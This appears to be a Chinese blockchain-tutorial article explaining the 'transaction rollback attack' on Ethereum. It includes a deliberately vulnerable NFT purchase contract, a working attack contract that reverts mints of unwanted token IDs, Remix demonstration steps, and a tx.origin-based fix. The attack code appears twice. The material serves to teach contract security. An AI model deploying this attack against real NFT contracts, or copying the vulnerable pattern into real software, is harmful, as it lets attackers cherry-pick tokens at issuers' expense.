# <span class='wp_keywordlink_affiliate'><a href="http://www.bwbbw.com/archives/tag/%e4%ba%a4%e6%98%93%e5%9b%9e%e6%bb%9a" title="View all posts in 交易回滚" target="_blank">交易回滚</a></span>攻击</p> <p>## 原理分析</p> <p>[以太坊 EVM](https://learnblockchain.cn/article/1229) 支持交易回滚，合约可以使不满足条件的调用失败，从而回滚部分或者整个交易。</p> <p>– 交易回滚</p> <p>使用 `assert()`，`require()` 和 `revert()` 可以使不满足条件的调用失败，配合 `try`，`catch` 可以回滚部分或者整个交易。</p> <p>– 回滚攻击</p> <p>如果业务合约允许合约调用或者调用了第三方合约，那么合约调用和第三方合约就可以利用交易回滚，撤销不符合自己期望的执行结果，从而达成攻击的目的。</p> <p>## 流程图示</p> <p>– 交易回滚<br /> “`mermaid<br /> graph TB<br /> sender[调用者] — 1 –> startContract[调用合约] — 2 –> contract[业务合约] — 3 –> startContract<br /> “`</p> <p>– 回滚攻击<br /> “`mermaid<br /> graph TB<br /> start[方法开始] –> contract[调用业务合约] –> check{调用结果是否符合预期} — 符合预期 –> endIt[方法结束]<br /> check — 不符合预期 –> rollback[交易回滚]<br /> “`</p> <p>## 示例代码</p> <p>这是一个简单的 NFT 合约示例，它的功能是购买 NFT。如果你看不出合约的问题，说明你正需要学习这节课。(这个合约有巨大漏洞，请不要直接使用在任何实际业务中)</p> <p>“`solidity<br /> //SPDX-License-Identifier: Unlicense<br /> pragma solidity ^0.8.12;</p> <p>import “@openzeppelin/contracts/token/ERC721/ERC721.sol”;</p> <p>interface INFT {<br /> function buyNFT() external payable;<br /> }</p> <p>contract NFT is ERC721 {<br /> uint256 tokenId;</p> <p> constructor() ERC721(“NFT”,”NFT”) {}</p> <p> function buyNFT() external payable {<br /> require(msg.value >= 1 ether, “NFT: You must pay 1 ether to buy an NFT”);<br /> _safeMint(msg.sender, tokenId++);<br /> }<br /> }</p> <p>contract TransactionRollbackAttack {<br /> INFT nft;<br /> uint256 tokenId;</p> <p> constructor(address _nft) {<br /> nft = INFT(_nft);<br /> }</p> <p> function doBuyNFT(uint256 _tokenId) external payable {<br /> tokenId = _tokenId;<br /> nft.buyNFT{value: msg.value}();<br /> }</p> <p> function onERC721Received(<br /> address operator,<br /> address from,<br /> uint256 _tokenId,<br /> bytes calldata data<br /> ) external returns (bytes4) {<br /> require(tokenId == _tokenId, “NFT: not the correct token”);<br /> return this.onERC721Received.selector;<br /> }<br /> }<br /> “`</p> <p>## 演示流程</p> <p>1. 打开 [https://remix.ethereum.org/](https://remix.ethereum.org/)</p> <p>2. 选择 solidity 版本为 0.8.12，部署 NFT 合约。</p> <p>3. 将 NFT 合约地址作为参数部署 TransactionRollbackAttack 合约。</p> <p>4. value 选择 1 Ether，点击 TransactionRollbackAttack 合约的 doBuyNFT 方法，参数输入 0，点击 transact，成功购买 tokenId 为 0 的 NFT。</p> <p>5. value 选择 1 Ether，点击 TransactionRollbackAttack 合约的 doBuyNFT 方法，参数输入 0，购买 tokenId 为 0 的 NFT 失败。</p> <p>## 修复问题</p> <p>– 禁止合约调用<br /> “`solidity<br /> modifier noContract() {<br /> require(tx.origin == msg.sender, “NFT: not contract”);<br /> }</p> <p> function buyNFT() noContract external payable {<br /> require(msg.value >= 1 ether, “NFT: You must pay 1 ether to buy an NFT”);<br /> _safeMint(msg.sender, tokenId++);<br /> }<br /> “`<br /> 使用 noContract 来禁止合约调用，可以防止交易回滚攻击。</p> <p>原文发布在 [https://github.com/33357/smartcontract-apps](https://github.com/33357/smartcontract-apps) 这是一个面向中文社区，分析市面上智能合约应用的架构与实现的仓库。欢迎关注开源知识项目！

//SPDX-License-Identifier: Unlicense
pragma solidity ^0.8.12;

import "@openzeppelin/contracts/token/ERC721/ERC721.sol";

interface INFT {
    function buyNFT() external payable;
}

contract NFT is ERC721 {
    uint256 tokenId;

    constructor() ERC721("NFT","NFT") {}

    function buyNFT() external payable {
        require(msg.value >= 1 ether, "NFT: You must pay 1 ether to buy an NFT");
        _safeMint(msg.sender, tokenId++);
    }
}

contract TransactionRollbackAttack {
    INFT nft;
    uint256 tokenId;

    constructor(address _nft) {
        nft = INFT(_nft);
    }

    function doBuyNFT(uint256 _tokenId) external payable {
        tokenId = _tokenId;
        nft.buyNFT{value: msg.value}();
    }

    function onERC721Received(
        address operator,
        address from,
        uint256 _tokenId,
        bytes calldata data
    ) external returns (bytes4) {
        require(tokenId == _tokenId, "NFT: not the correct token");
        return this.onERC721Received.selector;
    }
}

本文参与区块链开发网写作激励计划 ，好文好收益，欢迎正在阅读的你也加入。